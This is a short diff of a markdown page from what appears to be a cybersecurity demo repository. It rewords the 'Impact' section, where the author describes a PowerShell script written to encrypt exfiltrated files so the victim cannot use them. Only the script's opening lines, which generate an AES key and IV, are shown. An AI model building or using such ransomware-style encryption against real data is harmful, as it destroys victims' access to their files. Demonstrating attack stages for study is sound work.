EnricoPiccin02/Cybersecurity-Demo/home.md

 <br/>

 ## Impact
-To compromise the integrity of the exfiltrated files in order to make them unusable by the victim, I have created this Powershell script:
+To compromise the integrity of the exfiltrated files, rendering them unusable to the victim, I have developed a Powershell script:
 ```powershell
 # Generate a random AES encryption key and IV
 $key = New-Object byte[] 32